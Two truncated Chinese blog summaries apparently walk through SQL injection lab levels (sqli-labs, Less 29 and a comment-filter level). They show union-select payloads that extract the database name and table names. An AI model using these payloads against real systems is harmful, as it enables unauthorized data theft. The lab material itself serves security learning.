摘要:
1.和Less(29)一样,参数变成 id=("1"),但是不知道为什么php5.3.29,5.4.45可以,其他两个无法显示 就会出现这个情况 2.爆破: (1)爆库:?id=-1") union select 1,database(),3 --+ (2)爆表:?id=-1") union sel 阅读全文
摘要:
1.这个没有登录框,我们先看一下php文件 看到替换了能用的注释符,所以我们构造闭合语句 2.爆破 (1)爆库:?id=' union select 1,2,database() ' (2)爆表:?id=' union select 1,2,group_concat(table_name) from 阅读全文